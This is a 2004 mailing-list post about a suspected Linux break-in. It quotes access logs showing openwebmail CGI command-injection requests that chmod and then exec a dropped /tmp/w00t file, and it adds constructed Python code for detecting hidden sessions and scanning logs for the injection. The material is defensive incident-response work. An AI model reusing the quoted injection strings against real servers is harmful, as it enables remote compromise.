[linux-network] the who command

---------

From: Latife ZEYTİNELİ (lyolac@mku.edu.tr)
Date: Mon 21 Jun 2004 - 13:33:34 EEST


Hello,
When I run `who` I only see myself; even though I am root, I cannot see the other
users. What could be causing this?
I suspect that someone has gotten into the system.
When I run `last` I only see myself,
yet there are people connecting from elsewhere and I cannot see them,
and messages keep coming from syslogd:
someone has opened a session under a different name.
Could you please help me with this urgently?
Best regards,
Also, the following message arrived:
Dear Sir/Madam,
This Saturday (190604) somebody tried to gain root privileges on a
server in our server park. According to the log facility it was somebody
from your IP space.
First he tried to gain shell access by misusing some openwebmail bug and
then he tried to exploit the kernel with a local kernel exploit. We have
also found a script; it looks like there is some sort of daemon
listening on 194.27.44.15 that is waiting for connections from the
script, maybe some sort of autorooter/worm.
I hope you could have a look at this matter ASAP.

Kind Regards,

GrafiX Internet B.V.
Marcel Haman

access_log.1:194.27.44.15 - - [19/Jun/2004:14:12:40 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 151
access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:41 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 -
access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:53 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 151
access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:55 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 151
access_log.1:67.166.132.228 - - [19/Jun/2004:20:48:08 +0200] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Emaffiafeest%2Ecom%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=cgiscanner%40mail%2Enu&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 400 299
------- End of Forwarded Message -------
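The symptom in the post, `who` and `last` showing only the admin while other people are demonstrably logged in, is what utmp/wtmp cleaning or a replaced `who`/`last` looks like: the session records are gone, but the shells behind those sessions still hold their ptys open and PAM has already written "session opened" lines to syslog. The triage below cross-checks those three sources. It is an added example, not code from the post or from the list; the `who`, `ps -eo user,tty,pid,comm` and syslog captures are constructed to mirror the described situation (host name, PIDs and the `ftp`/`nobody` accounts are invented), and the 2004-era `sshd(pam_unix)` message format is assumed.

```python
import re

# Constructed captures (not from the post) illustrating the symptom described:
# `who` shows only root, while the process table and syslog show other sessions.
WHO_OUTPUT = """\
root     pts/0        Jun 21 13:20 (10.0.0.5)
"""

PS_OUTPUT = """\
USER     TT           PID COMMAND
root     ?              1 init
root     pts/0       2103 bash
ftp      pts/1       2210 bash
nobody   pts/2       2288 sh
nobody   pts/2       2301 perl
"""

SYSLOG = """\
Jun 21 13:20:01 mku sshd(pam_unix)[2100]: session opened for user root by (uid=0)
Jun 21 13:24:37 mku sshd(pam_unix)[2208]: session opened for user ftp by (uid=0)
Jun 21 13:31:09 mku sshd(pam_unix)[2286]: session opened for user nobody by (uid=0)
"""

# pam_unix session-open line; the user name is the token after "for user"
SESSION_RE = re.compile(r'session opened for user (\S+)')


def parse_who(text):
    """Map tty -> user from `who` output (first two whitespace-separated columns)."""
    sessions = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 2:
            sessions[fields[1]] = fields[0]
    return sessions


def parse_ps(text):
    """Parse `ps -eo user,tty,pid,comm` output; the header line is skipped."""
    procs = []
    for line in text.splitlines()[1:]:
        fields = line.split(None, 3)
        if len(fields) == 4:
            user, tty, pid, comm = fields
            procs.append({'user': user, 'tty': tty, 'pid': int(pid), 'comm': comm})
    return procs


def hidden_sessions(who_text, ps_text):
    """Terminals with attached processes but no utmp entry, i.e. what `who` is not showing.

    A session removed from utmp (by a log cleaner or a trojaned who/last) still
    has a shell holding its pty open, so the process table contradicts utmp."""
    known = parse_who(who_text)
    hidden = {}
    for p in parse_ps(ps_text):
        if p['tty'] == '?':          # no controlling terminal: daemons, kernel threads
            continue
        if p['tty'] not in known:
            hidden.setdefault(p['tty'], []).append(p)
    return hidden


def unaccounted_logins(who_text, syslog_text):
    """Users for whom PAM logged 'session opened' but who never appear in `who`."""
    seen = set(parse_who(who_text).values())
    logged = set(m.group(1) for m in SESSION_RE.finditer(syslog_text))
    return sorted(logged - seen)


def triage(who_text, ps_text, syslog_text):
    """Combine both checks into one report for the host being examined."""
    return {'hidden_ttys': hidden_sessions(who_text, ps_text),
            'unaccounted_users': unaccounted_logins(who_text, syslog_text)}


if __name__ == '__main__':
    result = triage(WHO_OUTPUT, PS_OUTPUT, SYSLOG)
    for tty, procs in result['hidden_ttys'].items():
        print(tty, ' '.join(f"{p['user']}:{p['comm']}({p['pid']})" for p in procs))
    print('logged in per syslog but absent from who:', result['unaccounted_users'])
```

On the real host, capture the three inputs with binaries you trust: once a local kernel exploit has been attempted, as the complaint says, `who`, `last` and `ps` may themselves have been replaced, so run copies from known-clean media or read `/proc/*/stat` directly, and dump utmp with `utmpdump /var/run/utmp` to see whether records were zeroed rather than merely unlisted. If the kernel exploit succeeded, a kernel-level rootkit can also hide processes from `/proc`, and only offline analysis of the disk is trustworthy.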

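The access_log excerpt in the complaint is a textbook CGI command injection: the `loginname` parameter of openwebmail's `userstat.pl` starts with `|`, and the two requests in sequence first `chmod 755` a dropped file in `/tmp` and then `exec` it. A defender with the same Apache logs wants to find every such request and reconstruct the injected command chain per source address. The scanner below is an added example, not code from the post or from the openwebmail project; its sample log is constructed to mirror the quoted lines (the request from 10.0.0.7 is an invented benign request for contrast), and the rule that flags `formmail.pl` hits with an outside `recipient` as a relay probe is a heuristic assumed here, not something the complaint states.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample, modelled on the access_log.1 excerpt quoted in the forwarded
# complaint (attacker addresses and request paths as in the post; the line from
# 10.0.0.7 is an added benign request for contrast).
SAMPLE_LOG = """\
194.27.44.15 - - [19/Jun/2004:14:12:40 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 151
194.27.44.15 - - [19/Jun/2004:14:17:41 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 -
10.0.0.7 - - [19/Jun/2004:15:01:02 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=alice HTTP/1.0" 200 151
67.166.132.228 - - [19/Jun/2004:20:48:08 +0200] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&recipient=cgiscanner%40mail%2Enu&msg=w00t HTTP/1.1" 400 299
"""

# Apache common log format: client, ident, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that mean "run this" once the value reaches a shell or a Perl
# two-argument open(); a legitimate login name never contains them.
SHELL_META = re.compile(r'[|;&`$<>\n]')


def analyse(line):
    """Return a finding dict for one log line, or None if it looks benign/unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group('target'))
    params = parse_qs(target.query, keep_blank_values=True)  # percent-decodes values
    base = {'ip': m.group('ip'), 'ts': m.group('ts'),
            'status': int(m.group('status')), 'path': target.path}

    if target.path.endswith('/openwebmail/userstat.pl'):
        for value in params.get('loginname', []):
            if SHELL_META.search(value):
                return dict(base, kind='openwebmail-cmdinject',
                            command=value.lstrip('|;& ').strip())

    # Heuristic (assumption, not from the post): a formmail.pl hit whose
    # recipient is an outside address is the classic open-relay probe.
    if target.path.endswith('/formmail.pl'):
        for rcpt in params.get('recipient', []):
            if '@' in rcpt:
                return dict(base, kind='formmail-probe', command=None, recipient=rcpt)
    return None


def scan(log_text):
    """Run analyse() over every line and keep the findings, in log order."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]


def staged_droppers(findings):
    """Group injected commands per source IP so the chmod -> exec sequence is visible.

    A 200 on the exec request means the CGI ran the command; whether the
    dropper itself succeeded is only visible on the host (/tmp/w00t, new
    listeners, utmp gaps)."""
    by_ip = {}
    for f in findings:
        if f['kind'] == 'openwebmail-cmdinject':
            by_ip.setdefault(f['ip'], []).append(f['command'])
    return by_ip


if __name__ == '__main__':
    findings = scan(SAMPLE_LOG)
    for f in findings:
        print(f['ts'], f['ip'], f['kind'], f.get('command') or f.get('recipient'))
    print(staged_droppers(findings))
```

Run it over the real `access_log*` files with `scan(open(path).read())`; the decoded command list per address is what to hand back to the complainant, and the file names it reveals (here `/tmp/w00t`) are the first thing to look for on the host that was hit.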

---------

This archive was generated by hypermail 2.1.7.